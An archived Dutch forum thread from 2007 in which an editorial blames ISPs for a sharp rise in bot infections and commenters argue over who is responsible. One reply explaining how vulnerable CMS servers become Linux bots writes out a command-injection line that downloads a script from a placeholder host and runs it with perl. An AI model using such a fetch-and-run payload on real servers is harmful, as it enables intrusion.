Archief - De topics van lang geleden

Explosieve bot toename schuld van providers

11-09-2007, 15:59 door Redactie, 36 reacties

Vorige week was Trend Micro "senior anti-virus" onderzoeker David Sancho in Nederland. Hij schetste een donker beeld van de beveiliging in ons kikkerlandje. Het aantal bot infecties nam in 2007 namelijk met 225% toe, en groeide daarmee veel sneller dan in de rest van Europa. Nu kun je de consument kwalijk nemen dat hij zich heeft laten infecteren of de virusschrijver vervloeken voor het schrijven van de malware. Toch zullen deze beide partijen niets aan de situatie doen om die te verbeteren.

En dat brengt ons bij de Internet service provider. Al lang niet meer de aanbieder van "alleen internet", maar ook al zou dat wel zo zijn, dan nog steeds is de provider verantwoordelijk voor het schoonhouden van zijn gedeelte van de digitale snelweg. Alle ISP's verbieden hun klanten om te spammen, maar als die klant met een bot geinfecteerd is, is dit meestal geen probleem.

Zombies bestaan al meer dan vier jaar, toch is de situatie alleen maar verslechterd. Als er actiever maatregelen worden genomen, zoals het automatisch afsluiten van geïnfecteerde abonnees, of die door te verwijzen naar een pagina met behulpzame informatie, had er nooit zo'n explosieve toename kunnen plaatsvinden. Onze stelling luidt derhalve: Explosieve bot toename schuld van providers

Reacties (36)
11-09-2007, 16:13 door Ed Dekker
225% van wat? Waren het er eerst 4 en nu 9? ;-)

Is de autodealer verantwoordelijk als jij 160 rijdt in een 30 km/h zone?
Is de timmerman die de deur levert verantwoordelijk als jij hem niet op slot doet?
Is de Hema/Blokker/... verantwoordelijk als jij jezelf met een daar gekocht mes in de vingers snijdt?

Als mensen niet verantwoordelijk willen zijn voor de gevolgen van hun eigen gedrag, moeten ze het gedrag achterwege laten en niet proberen de verantwoordelijkheid af te schuiven.
11-09-2007, 16:20 door Anoniem
Is de automobilist verantwoordelijk als iemand z'n cruise control "aanpast"
waardoor hij niet kan afremmen?
11-09-2007, 16:27 door Anoniem
Door Ed Dekker
225% van wat? Waren het er eerst 4 en nu 9? ;-)

Is de autodealer verantwoordelijk als jij 160 rijdt in een
30 km/h zone?
Is de timmerman die de deur levert verantwoordelijk als jij
hem niet op slot doet?
Is de Hema/Blokker/... verantwoordelijk als jij jezelf met
een daar gekocht mes in de vingers snijdt?

Als mensen niet verantwoordelijk willen zijn voor de
gevolgen van hun eigen gedrag, moeten ze het gedrag
achterwege laten en niet proberen de verantwoordelijkheid af
te schuiven.


Helemaal mee eens. nederland staat nergens hoog op de
lijsten met besmettingen en bronnen voor hacks.

Volgens mij wil er weer iemand wat verkopen. En nu aan ISP's.

Als ze bij Trend nou eens een goed product gaan maken in
plaats van dommem dingen roepen...
11-09-2007, 16:30 door low-res
Mooi verhaal van meneer Trend Micro... Laat ze eerst hun
eigen software na kijken :P

http://www.frsirt.com/english/advisories/2007/0638
11-09-2007, 16:45 door wimbo
Door Ed Dekker
225% van wat? Waren het er eerst 4 en nu 9? ;-)

Is de autodealer verantwoordelijk als jij 160 rijdt in een
30 km/h zone?
Is de timmerman die de deur levert verantwoordelijk als jij
hem niet op slot doet?
Is de Hema/Blokker/... verantwoordelijk als jij jezelf met
een daar gekocht mes in de vingers snijdt?

Als mensen niet verantwoordelijk willen zijn voor de
gevolgen van hun eigen gedrag, moeten ze het gedrag
achterwege laten en niet proberen de verantwoordelijkheid af
te schuiven.

Als je (structureel) te hard rij, dan is daar meneer agent
die je daar voor bestraft.
Als je jezelf te diep in de vingers snij, dan is daar een
verpleegkundige (of chirurg) die de boel repareert.
M.a.w. de gebruiker moet zelf alles in de gaten houden en
als blijkt dat de gebruiker er niet tegenop gewassen is
(voet van het gas of zelf een pleister plakken), dan is daar
de agent/chirurg om de boel te corrigeren.

In het geval van het Internet is dat dan de provider die de
aansluiting in een quarantaine zet, waarbij alleen basic
functionaliteit wordt geboden om de problemen te verhelpen.
Zo raar vind ik het dus niet.

Overigens doet XS4ALL dit al. Je kan dan alleen nog maar via
hun proxy internetten om je besmettingen te verwijderen.
11-09-2007, 16:49 door spatieman
jullie weten toch wat ik altijd zeg.
zolang iedere sukkel op alles klikt wat ze onderde muis krijgen.
is het huneigen schuld!
11-09-2007, 16:54 door Anoniem
Mijn jongeren neven , stefane en harold maken Sombie
computer van hun pc. Alleen bij gebruiken ze MSN. Het
verwijderen of maatregelen nemen heeft geen zin! Ze maken er
graag sombie pc van door (dat firewall MSN blockeerd en
alles moet werk en ze willen alles openen)! Microsoft update
dat gebeurd nooit meer, (de aanvallers proberen update
uiteschakelen)! Raport over hoe sommigen met hun pc omgaan.
Jeroen Roland
11-09-2007, 17:04 door [Account Verwijderd]
[Verwijderd]
11-09-2007, 17:30 door Jan-Hein
Een eindverantwoordelijke of zelfs schuldige aanwijzen gaat niet veel
helpen.
De schuld geef ik zelf graag aan de aanvaller (makkelijk), en de
verantwoordelijkheid wordt in de praktijk nu eenmaal gedeeld, hoe
vervelend en moeilijk werkbaar dat ook is.
Ik zie nog de meeste kans voor verbetering als er een modus wordt
gevonden waarin de diverse bij de verdediging betrokken partijen beter
met elkaar samenwerken.
Dus ISP, malware bestrijders, gebruikers, overheid, etc.
11-09-2007, 20:27 door ml2mst
Het is inmiddels bekend dat de Zombies binnen een botnet uitsluitend uit Windows machines bestaan. Derhalve lijkt het mij zeer redelijk dat de producent van dit gammele besturingssysteem verantwoordelijk wordt gesteld.
11-09-2007, 20:33 door [Account Verwijderd]
[Verwijderd]
11-09-2007, 20:44 door Anoniem
Door moppentappers op dinsdag 11 september 2007 20:33

quote:Door ml2mst
Het is inmiddels bekend dat de Zombies binnen een botnet
uitsluitend uit Windows machines bestaan. Derhalve lijkt het
mij zeer redelijk dat de producent van dit gammele
besturingssysteem verantwoordelijk wordt gesteld.


Wat een onzin, als linux het meest gebruikte systeem is dan
heeft die PRECIES dezelfde problemen


Ahhh, expert, zeg er eens wat van!? :)
11-09-2007, 20:56 door Anoniem
Als het even puur om het spam-aspect gaat:

De vraag vind ik: hoe kan een internet provider hier
inderdaad een oplossing bieden die goed werkt. Met mijn
Orange ADSL verbinding mag ik al niet een SMTP connectie
maken met een host anders dan de smtp servers van
EuroNet/Wanadoo/Orange. Dat vind ik opzich al een goed idee.
De bots kunnen niet meer zelf mail sturen, maar zijn
afhankelijk van een relay-host (if any). Op die manier
kanaliseer je tenminste nog het verkeer over een host
waarover je controle hebt.

Maar die controle tot iets nuttigs maken in dit geval is ook
weer lastig als je er over na gaat denken, want om dat te
kunnen laten werken moet die host dus mail kunnen weigeren
als dat volgens een complex algoritme spam zou zijn. Ik denk
false positives enzo. En ook: gaat die mail (spam) toch naar
buiten, dan is de mailserver van Orange snel black-listed.
Minstens zo vervelend als het eerste.

In de praktijk zal het al heel veel schelen als die filters
dan relatief conservatief afgesteld staan en statitisch
gezien met 99.9% zekerheid durven te zeggen dat er geen
sprake zal zijn van false-positives (maar wel een inherent
redelijke hoeveelheid spam die er toch doorheen komt).

Het blijft echter dweilen met de kraan open. Het lijkt mij
dat het SMTP in zijn geheel d00d moet, maar wat er voor in
de plaats moet komen weet ik ook nog niet. Helaas kom ik
altijd weer uit op 'betalen per verstuurde e-mail' ...

Stel nou dat het inderdaad zover komt. 1 Mail sturen kost
dan 1 cent. Hoeveel mail stuur jij? Ik misschien maar 1-5
per dag hooguit met uitschieters daargelaten. Hoef je ook
niet wakker van te liggen. Of het spam tegenhoudt moet je
nog maar zien, maar als het dat wel doet, is het een kleine
prijs voor een hoop irritatie (en resources) minder...

Ik dwaal af.
11-09-2007, 21:36 door Anoniem
Door moppentappers
Door ml2mst
Het is inmiddels bekend dat de Zombies binnen een botnet
uitsluitend uit Windows machines bestaan. Derhalve lijkt het
mij zeer redelijk dat de producent van dit gammele
besturingssysteem verantwoordelijk wordt gesteld.
Wat een onzin, als linux het meest gebruikte systeem is dan
heeft die PRECIES dezelfde problemen

En jij bent handig als je een terminal opent in Linux?
11-09-2007, 21:47 door nixfreak
Wat een onzin, als linux het meest gebruikte systeem
is dan
heeft die PRECIES dezelfde problemen

Kijk, DAT is nou weer complete onzin.....moppentappers moet
zich maar met zijn core-business "moppen tappen"bezig
houden, want hij heeft schijnbaar nog nooit een
Linux-machine aangeraakt.
11-09-2007, 21:51 door Anoniem
ze direct de schuld geven vind ik was onnodig en overdreven,
maar het zijn wel de ISPs die het best kunnen helpen om er
wat aan te doen. gebruikers is waar het duidelijk van is dat
ze besmet zijn direct afsluiten en ondersteuning bieden bij
het schoonmaken.
11-09-2007, 22:19 door [Account Verwijderd]
[Verwijderd]
11-09-2007, 22:23 door the virusman
De waarheid ligt in het midden ISP mogen hun verantwoordelijkheid naar
mijn mening ook wel een beetje nemen en sommige doen dat ook
redelijk goed.

Gebruikers daarentegen zijn natuurlijk zelf ook verantwoordelijk voor hun
pc, sommige maken er echt een potje van en kijken idd nergens naar
(lekker veilig bank zaken doen) vaak zijn het echter de kids in huis die de
pc aardig om zeep weten te helpen en weer een nieuw botnetwerk
slachtoffer weten te creëren.

De eigenaar van de pc is vaak onwetend en de kids maakt het niets uit,
mijn mening is wel dat isp bij het vermoeden van zombies een
waarschuwing dienen te geven en bij geen reactie gewoon af dienen te
sluiten.
11-09-2007, 22:34 door [Account Verwijderd]
[Verwijderd]
12-09-2007, 02:18 door Anoniem
Door nixfreak
Wat een onzin, als linux het meest gebruikte systeem
is dan
heeft die PRECIES dezelfde problemen

Kijk, DAT is nou weer complete onzin.....moppentappers moet
zich maar met zijn core-business "moppen tappen"bezig
houden, want hij heeft schijnbaar nog nooit een
Linux-machine aangeraakt.

Je hebt zelf een reality check nodig. Linux servers zijn de meest gehackte
servers op het Internet. De reden is dat er nogal wat troep draait op Linux.

Jij als nixfreak vind dat natuurlijk onzin, dat is het verschil tussen fanatisme
en de werkelijkheid.
12-09-2007, 08:28 door Anoniem
Computerbewijs invoeren. Alleen mensen die hebben aangetoond
verantwoordelijk met het ding om te kunnen gaan zonder
toezicht er mee laten werken. Doen we met auto's ook, werkt
best aardig
12-09-2007, 09:04 door root
Ik ben het met moppentappers eens.
12-09-2007, 09:48 door Anoniem
De schuld ligt m.i. in het feit dat de meeste computers zich
wel erg makkelijk laten misbruiken. Dat komt weer doordat de
meeste gebruikers op die computers (standaard) als
Administrator werken en dus ook alles kunnen verzieken.
Dat komt weer doordat de leverancier die onveilige
standaardinstellingen gebruikt, in een tijd waarin virussen
en andere malware al een flink probleem waren. Goed voor het
marktaandeel. Een bewuste keuze voor eigen gewin ten koste
van anderen.
De overheden zouden meer kunnen doen om ten minste enig
bewustzijn te kweken bij de grote massa. Postbus 51-spotjes.
Kracht van herhaling.
Het probleem van het meest gebruikte os, is dat het lastig
is om veel toepassingen te draaien zonder dat je Admin bent.
Van gemiddelde gebruikers kan je moeilijk verwachten dat die
rechten op registry-keys gaan zetten om te zorgen dat ze als
non-admin toch kunnen werken.
Dat komt uiteindelijk weer door de populariteit van Win 9x,
zonder veiligheidsmodel. En veel derde software-leveranciers
hadden hun software best kunnen aanpassen naar het
veiligheidsmodel van NT. Maar dat was waarschijnlijk te duur.
Affijn, dat weten we allemaal.
De domheid van de gemiddelde gebruiker, en de hebberigheid
van de gemiddelde mens, vormen samen een soort
succes-formule zou je kunnen zeggen :)


Bij de installatie van Windows XP zie je al schermpjes
voorbij flitsen dat het zo veilig is voor internet enz. Toch
werk je standaard zonder wachtwoord als Administrator.
In de tijd dat XP uitkwam met deze standaardinstelling, kon
j de meeste linuxen al niet verder installeren zonder (goed)
root-wachtwoord te kiezen. Hmmm...
Toen XP uitkwam, waren virussen en andere malware niet nieuw
en zou je van de leverancier veiliger standaardinstellingen
(mogen) verwachten.
Maar het werkt makkelijker en dus beter voor het marktaandeel.
12-09-2007, 11:03 door Anoniem
TU-Delft heeft dat al als standaard protocol ingesteld.
Als ik me niet vergis was dat al na de Nimda uitbraak.

Je komt het internet gewoon niet op als er "fout" verkeer
van een computer af komt. De enige plek waar je wel komt is
een pagina die uitleg geeft over wat er aan de hand is en
waar je meer info kan krijgen.
12-09-2007, 12:12 door Anoniem
Door Anoniem
Mijn jongeren neven , stefane en harold maken Sombie
computer van hun pc. Alleen bij gebruiken ze MSN. Het
verwijderen of maatregelen nemen heeft geen zin! Ze maken er
graag sombie pc van door (dat firewall MSN blockeerd en
alles moet werk en ze willen alles openen)! Microsoft update
dat gebeurd nooit meer, (de aanvallers proberen update
uiteschakelen)! Raport over hoe sommigen met hun pc omgaan.
Jeroen Roland

Me dunkt dat je met deze kennis op glad ijs loopt juridisch.
12-09-2007, 12:29 door [Account Verwijderd]
Door Anoniem
Je hebt zelf een reality check nodig. Linux servers zijn de
meest gehackte
servers op het Internet. De reden is dat er nogal wat troep
draait op Linux.

Je spreekt jezelf tegen. Het is dus in feite niet Linux maar
de troep erbovenop die gehacked wordt.
12-09-2007, 14:21 door Anoniem
Het onderliggende probleem is op Windows en Linux en ook BSD
het zelfde, 'identity based access controll' als hoofd (en
vaak enige) model
voor access controll. Geneuzel over meer bugs voor systeem X
dan systeem Y slaat de plank helemaal mis, en zelfs het al
dan niet als 'admin' draaien haalt niet veel uit, een
applicatie kan immers al best veel kwaad met 'alle' rechten
van een standaard gebruiker.
Het probleem is gewoon dat 'gebruiker' veel te weinig
granulatiteit
is voor een veilig systeem, dat probleem is op elk van de
genoemde besturingssystemen even groot aanwezig.
12-09-2007, 19:42 door Anoniem
Door Anoniem
TU-Delft heeft dat al als standaard protocol ingesteld.
Als ik me niet vergis was dat al na de Nimda uitbraak.

Je komt het internet gewoon niet op als er "fout"
verkeer
van een computer af komt. De enige plek waar je wel komt is
een pagina die uitleg geeft over wat er aan de hand is en
waar je meer info kan krijgen.

de UT heeft ook zoiets, quarantaine net:
http://www.quarantainenet.com/
13-09-2007, 00:19 door Anoniem
Door Ed Dekker
225% van wat? Waren het er eerst 4 en nu 9? ;-)

Is de autodealer verantwoordelijk als jij 160 rijdt in een
30 km/h zone?
Is de timmerman die de deur levert verantwoordelijk als jij
hem niet op slot doet?
Is de Hema/Blokker/... verantwoordelijk als jij jezelf met
een daar gekocht mes in de vingers snijdt?

Als mensen niet verantwoordelijk willen zijn voor de
gevolgen van hun eigen gedrag, moeten ze het gedrag
achterwege laten en niet proberen de verantwoordelijkheid af
te schuiven.

wat een poep vergelijking
13-09-2007, 10:23 door Jan-Hein
Door Anoniem
Het onderliggende probleem is op Windows en Linux en ook BSD
het zelfde, 'identity based access controll' als hoofd (en
vaak enige) model
voor access controll. Geneuzel over meer bugs voor systeem X
dan systeem Y slaat de plank helemaal mis, en zelfs het al
dan niet als 'admin' draaien haalt niet veel uit, een
applicatie kan immers al best veel kwaad met 'alle' rechten
van een standaard gebruiker.
Het probleem is gewoon dat 'gebruiker' veel te weinig
granulatiteit
is voor een veilig systeem, dat probleem is op elk van de
genoemde besturingssystemen even groot aanwezig.
Ik ben er zelf van overtuigd dat we ons niet moeten beperken tot een
enkele invalshoek (zie vorige item over AV versus signing), dat we alle
componenten in samenhang moeten beschouwen, en dat we van geen
enkele maatregel de "totaal oplossing" moeten verwachten, maar dat
reduceert discussies over individuele componenten in het proces niet
perse tot geneuzel.
Zo is het idee om gebruikers te ontmoedigen om als super user te werken
wel degelijk een positieve bijdrage aan de risico reductie, omdat een
aanvaller er eenvoudig mee wordt beperkt in zijn mogelijkheden; ik kan me
voorstellen dat sommigen daar op blijven hameren, ook al gaat dat op den
duur met een verzuchting gepaard.
Maar misschien nog belangrijker: wat levert volgens U dan wel voldoende
granulariteit?
13-09-2007, 11:01 door SirDice
Het "probleem" ligt eigenlijk bij alle partijen...

Microsoft, omdat ze een OS leveren waarbij iedereen standaard administrator is.

De ISP's omdat ze geïnfecteerde klanten niet snel genoeg afsluiten.

En last but not least de gebruiker die uiteindelijk toch de eindverantwoordelijke is..


Oh en de opmerking dat botnets uitsluitend uit windows machines bestaan is natuurlijk onzin.. Ik heb al genoeg botnets opgerold die toch volledig uit linux machines bestonden (kaiten en diverse bots in perl geschreven)..
13-09-2007, 13:02 door Anoniem
@SirDice
Ik heb al genoeg botnets opgerold

en jij werkt voor ??
13-09-2007, 15:21 door SirDice
Diversen... Detachering... Als security specialist ;)

Bovendien is het erg leuk om een botnet over te nemen en vervolgens het hele zaakje remote uit te zetten :D
13-09-2007, 21:29 door nixfreak
Ik heb al genoeg botnets opgerold die toch volledig
uit linux machines bestonden,in perl geschreven

Lees ik hier toch dat op Linux deze botnet-software is
GESCHREVEN.......m.a.w. die is er opzettelijk door de
gebruiker (of gehackte machine) op gezet. Hoe wil jij anders verklaren dat dat perl-script uitvoerbaar op de machine komt. Als jij beweert om b.v. een linuxmachine remote te kunnen "besmetten" met zo'n perlscript (ik praat niet over root-toegang) dan wil ik dat best eens met je uittesten.


Blijft toch een heel andere manier om een machien in een
bot te veranderen dan op M$, want daarvoor is voldoende
klikgeil volk wat als administrator (of zelfs minder) zit te
klooien voldoende.

Trouwens, SirDice, kan ik b.v. dat overzicht aan linux-bots
ook ergens op een publiekelijk toegangkelijke url
terugvinden (lijkt me interresant) Alles wat ik tot dusver aan bots-overzichten kan vinden wordt toch door M$-machines bevolkt.

m.a.w. ik heb hier nog niemand de uitspraak van ml2mst onderuit zien halen.
14-09-2007, 08:51 door SirDice
Door nixfreak
Ik heb al genoeg botnets opgerold die toch volledig uit linux machines bestonden,in perl geschreven

Lees ik hier toch dat op Linux deze botnet-software is GESCHREVEN.......m.a.w. die is er opzettelijk door de gebruiker (of gehackte machine) op gezet. Hoe wil jij anders verklaren dat dat perl-script uitvoerbaar op de machine komt. Als jij beweert om b.v. een linuxmachine remote te
kunnen "besmetten" met zo'n perlscript (ik praat niet over root-toegang) dan wil ik dat best eens met je uittesten.
De meeste van die Linux bots waren apache/php servers met een lekke joomla of andere CMS, phpbb etc. Een dergelijke bug hoeft inderdaad niet specifiek Linux te zijn echter de manier hoe de exploit gemaakt is zorgt er voor dat men alleen Linux kan machines infecteren. Met een paar verandering zou het net zo goed op Freebsd kunnen draaien. De bug zit immers in het CMS of forum en niet zozeer in het OS. Populair is om een command injection te doen, bijv. "cd /tmp; wget http://someserver.com/a.txt; perl /tmp/a.txt".
Blijft toch een heel andere manier om een machien in een bot te veranderen dan op M$, want daarvoor is voldoende klikgeil volk wat als administrator (of zelfs minder) zit te klooien voldoende.
Gedeeltelijk mee eens. Ja het is een andere manier maar vergeet niet dat deze Linux bots op het Apache account (nobody of www) draaien. Vergeet ook niet dat je om te kunnen e-mailen, IRC, http connecties etc. te kunnen maken geen root/administrator rechten nodig hebt.

Trouwens, SirDice, kan ik b.v. dat overzicht aan linux-bots ook ergens op een publiekelijk toegangkelijke url terugvinden (lijkt me interresant) Alles wat ik tot dusver aan bots-overzichten kan vinden wordt toch door M$-machines bevolkt.
Zo direct even een lijstje heb ik niet maar zoek even op DSNX bot, Q8bot, perlbot en Kaiten.
m.a.w. ik heb hier nog niemand de uitspraak van ml2mst onderuit zien halen.
Door SirDice
Oh en de opmerking dat botnets uitsluitend uit windows machines bestaan is natuurlijk onzin.
18-09-2007, 15:42 door Anoniem
Daar gaan we weer.

En als ik iemand doodschiet het is ook de schuld van God/Allah/whatever.
Vooral NOOIT zelf verantwoordelijk zijn.

Afgezien van het feit dat ik dus vind dat gebruikers zelf verantwoordelijk zijn
wil ik helemaal niet mijn ISP filtert. Dit belemmerd _mijn_ privacy (en die
van jullie) en dat allemaal omdat een andere **** zijn PC niet kan
beveiligen.

Overigens, als de timmerman vergeet het slot in mijn deur te bouwen kan
ik mijn deur niet op slot doen. Wellicht terug naar MS? :P
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.